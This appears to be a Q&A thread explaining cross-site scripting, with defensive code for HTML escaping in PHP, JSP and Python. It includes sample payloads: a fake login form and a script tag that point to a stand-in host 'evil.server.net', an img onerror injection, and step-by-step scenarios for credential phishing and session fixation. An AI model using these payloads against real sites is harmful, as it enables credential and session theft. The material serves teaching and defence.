What is the general concept behind XSS?
I don't get how JS/VBScript can cause so much damage!
OK. Suppose you have a site, and the site is served from http://trusted.server.com/thesite. Let's say this site has a search box, and when you search, the URL becomes: http://trusted.server.com/thesite?query=somesearchstring.
If the site does not process the search string and simply outputs it in the result, like "Your search "somesearchstring" didn't yield any results", then anybody can inject arbitrary HTML into the site. For example:
http://trusted.server.com/thesite?query=<form action="http://evil.server.net">username: <input name="username"/><br/>password: <input name="pw" type="password"/><br/><input type="submit"/></form>
So, in this case, the site will dutifully show a fake login form on the search results page, and if the user submits it, it will send the data to the evil, untrusted server. But the user doesn't see that: especially if the URL is really long, they will just see the first bit and assume they are dealing with trusted.server.com.
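To make the reflection concrete, here is a minimal Python sketch of such a search results page. It is not how any particular site is written: the function names and the shortened payload are made up for illustration. The first function pastes the query into the page verbatim, the second runs it through the standard library's html.escape first.

```python
import html


def render_results_unsafe(query: str) -> str:
    # Hypothetical vulnerable handler: the query is echoed verbatim,
    # so any markup in it becomes part of the page.
    return f'<p>Your search "{query}" didn\'t yield any results.</p>'


def render_results_escaped(query: str) -> str:
    # html.escape converts &, <, > and (by default) both quote characters
    # to entities, so the browser displays the payload as plain text.
    return f'<p>Your search "{html.escape(query)}" didn\'t yield any results.</p>'


# Shortened version of the fake login form from the URL above.
payload = (
    '<form action="http://evil.server.net">'
    '<input name="pw" type="password"/></form>'
)

unsafe_page = render_results_unsafe(payload)
escaped_page = render_results_escaped(payload)

print(unsafe_page)   # contains a live <form> pointing at evil.server.net
print(escaped_page)  # contains &lt;form ...&gt; which renders as text
```

In the unsafe version the form is real markup and will be rendered; in the escaped version the visitor just sees the odd-looking search string.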
Variations on this include injecting a <script> tag that adds event handlers to the document to track the user's actions, or that sends the document cookie to the evil server. This way you can hope to bump into sensitive data like logins, passwords, or credit card data. Or you can try to insert a specially styled <iframe> that occupies the entire client window and serves a site that looks like the original but actually originates from evil.server.net. As long as the user is tricked into using the injected content instead of the original, security is compromised.
This type of XSS is called reflective and non-persistent. Reflective because the URL is "reflected" directly in the response, and non-persistent because the actual site is not changed - it just serves as a pass-through. Note that something like HTTPS offers no protection whatsoever here - the site itself is broken, because it parrots the user input from the query string.
The trick is now to get unsuspecting users to trust any links you give them. For example, you can send them an HTML email and include an attractive-looking link which points to the forged URL. Or you can perhaps spread it on wikis, forums, etc. I am sure you can appreciate how easy it really is - it's just a link, what could go wrong, right?
Sometimes it can be worse. Some sites actually store user-supplied content. Simple example: comments on a blog or threads on a forum. Or it may be more subtle: a user profile page on a social network. If those pages allow arbitrary HTML, especially script, and this user-supplied HTML is stored and reproduced, then everybody who simply visits the page that contains this content is at risk. This is persistent XSS. Now users don't even need to click a link anymore; just visiting is enough. Again, the actual attack consists of modifying the page through script in order to capture user data.
Script injection can be blunt, for example, one can insert a complete <script src="http://evil.server.net/script.js">, or it may be subtle: <img src="broken" onerror="...quite elaborate script to dynamically add a script tag..."/>.
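The subtle variant is the reason filtering out <script> tags alone is not enough. As a rough Python sketch (the filter function is a made-up naive example, and alert(1) stands in for the elaborate script), a tag-stripping filter removes the blunt injection but lets the onerror handler straight through, whereas escaping the whole string neutralizes both:

```python
import html
import re


def strip_script_tags(text: str) -> str:
    # Hypothetical naive filter: removes <script>...</script> blocks only.
    pattern = r"<script\b[^>]*>.*?</script\s*>"
    return re.sub(pattern, "", text, flags=re.IGNORECASE | re.DOTALL)


blunt = '<script src="http://evil.server.net/script.js"></script>'
subtle = '<img src="broken" onerror="alert(1)"/>'  # alert(1) is a stand-in

filtered_blunt = strip_script_tags(blunt)    # the script tag is removed
filtered_subtle = strip_script_tags(subtle)  # unchanged: no <script> tag to strip

# Escaping does not care which tag or attribute carries the script.
escaped_subtle = html.escape(subtle)

print(repr(filtered_blunt))
print(filtered_subtle)
print(escaped_subtle)
```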
As for how to protect yourself: the key is to never output user input verbatim; escape it first. This may be difficult if your site revolves around user-supplied content with markup.
Straightforward XSS
- I find Google has an XSS vulnerability.
- I write a script that rewrites a public Google page to look exactly like the actual Google login.
- My fake page submits to a third party server, and then redirects back to the real page.
- I get Google account passwords, users don't realize what happened, Google doesn't know what happened.
XSS as a platform for CSRF (this supposedly actually happened)
- Amazon has a CSRF vulnerability where an "always keep me logged in" cookie allows you to flag an entry as offensive.
- I find an XSS vulnerability on a high traffic site.
- I write some JavaScript that requests the URLs to mark all books written by gay/lesbian authors on Amazon as offensive.
- To Amazon, they are getting valid requests from real browsers with real auth cookies. All the books disappear off the site overnight.
- The internet freaks the hell out.
XSS as a platform for Session Fixation attacks
- I find an e-commerce site that does not reset its session after a login (like any ASP.NET site), lets you pass the session ID in via query string or via cookie, and stores auth info in the session (pretty common).
- I find an XSS vulnerability on a page on that site.
- I write a script that sets the session ID to the one I control.
- Someone hits that page, and is bumped into my session.
- They log in.
- I now have the ability to do anything I want as them, including buying products with saved cards.
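The weak point in the steps above is that the session ID survives the login. A minimal Python sketch of the difference, assuming a made-up in-memory session store (the dictionary and function names are illustrative, not any framework's API):

```python
import secrets

# Hypothetical in-memory session store: session ID -> session data.
sessions = {}


def new_session() -> str:
    sid = secrets.token_urlsafe(32)
    sessions[sid] = {}
    return sid


def login_keep_id(sid: str, user: str) -> str:
    # Vulnerable: the pre-login ID (possibly chosen by an attacker)
    # now identifies an authenticated session.
    sessions[sid]["user"] = user
    return sid


def login_regenerate(sid: str, user: str) -> str:
    # Safer: drop the old ID and move the data to a freshly generated one,
    # so an ID fixed before login is worthless afterwards.
    data = sessions.pop(sid, {})
    data["user"] = user
    fresh_sid = secrets.token_urlsafe(32)
    sessions[fresh_sid] = data
    return fresh_sid


attacker_sid = new_session()  # the ID the attacker controls
victim_sid = login_regenerate(attacker_sid, "victim")

print(attacker_sid in sessions)     # False: the fixed ID no longer exists
print(sessions[victim_sid]["user"])  # victim
```

With login_keep_id the attacker's ID would still be valid after the victim logs in, which is exactly the situation described in the list.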
Those three are the big ones. The problem with XSS, CSRF, and Session Fixation attacks is that they are very, very hard to track down and fix, and really easy to introduce, especially if a developer doesn't know much about them.
Since the other answers already explain how XSS can be malicious, I'll only answer the following question, which was left unanswered:
How can I prevent XSS from happening on my websites?
To prevent XSS, you need to HTML-escape any user-controlled input when it is about to be redisplayed on the page. This includes request headers, request parameters, and any stored user-controlled input which is served from a database. In particular, <, >, " and ' need to be escaped, because they can malform the surrounding HTML code where this input is redisplayed.
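To illustrate how a quote character can malform the surrounding HTML, here is a small Python sketch using the standard library's html.escape. The render functions and the attack string are made up for the example; the input is placed inside a value attribute, once verbatim and once escaped:

```python
import html


def render_input_unsafe(value: str) -> str:
    # The value is pasted verbatim into a double-quoted attribute.
    return f'<input name="foo" value="{value}">'


def render_input_escaped(value: str) -> str:
    # quote=True (the default) also escapes " and ', not just <, > and &.
    return f'<input name="foo" value="{html.escape(value, quote=True)}">'


# The leading " closes the value attribute and starts a new one.
attack = '" onmouseover="alert(1)'

print(render_input_unsafe(attack))
# <input name="foo" value="" onmouseover="alert(1)">

print(render_input_escaped(attack))
# <input name="foo" value="&quot; onmouseover=&quot;alert(1)">
```

In the first output the browser sees an extra onmouseover attribute; in the second the whole string stays inside value.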
Almost any view technology provides built-in ways to escape HTML (or XML, that's also sufficient) entities.
In PHP you can do that with htmlspecialchars(). E.g.
<input name="foo" value="<?php echo htmlspecialchars($foo); ?>">
If you need to escape single quotes as well, you'll need to supply the ENT_QUOTES argument (it is part of the default flags as of PHP 8.1); see also the PHP documentation for htmlspecialchars().
In JSP you can do that with JSTL <c:out> or fn:escapeXml(). E.g.
<input name="foo" value="<c:out value="${param.foo}" />">
or
<input name="foo" value="${fn:escapeXml(param.foo)}">
Note that you don't need to escape for XSS during request processing, only during response processing. Escaping during request processing is not needed and may sooner or later malform the user input (and as a site admin you'd also like to know what the user in question actually entered, so that you can take social action if necessary). As for SQL injection, only escape during request processing, at the moment when the data is about to be persisted in the database.
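As a rough Python sketch of that split, assuming an in-memory SQLite table invented for the example: the comment is stored exactly as entered and only HTML-escaped when rendered. For the SQL side this sketch uses a parameterized query (the ? placeholder) rather than manual escaping, which is a different technique with the same goal of keeping the input from being interpreted as SQL.

```python
import html
import sqlite3

# Hypothetical schema, for illustration only.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE comments (body TEXT)")


def save_comment(body: str) -> None:
    # Request processing: store the raw input. The ? placeholder makes the
    # driver treat it as data, never as part of the SQL statement.
    conn.execute("INSERT INTO comments (body) VALUES (?)", (body,))


def render_comments() -> str:
    # Response processing: HTML-escape at the moment of output.
    rows = conn.execute("SELECT body FROM comments").fetchall()
    return "".join(f"<li>{html.escape(body)}</li>" for (body,) in rows)


raw = "<script>alert('x')</script>'); DROP TABLE comments;--"
save_comment(raw)

stored = conn.execute("SELECT body FROM comments").fetchone()[0]
page = render_comments()

print(stored == raw)  # True: the database holds what the user typed
print(page)           # the script tag appears only in escaped form
```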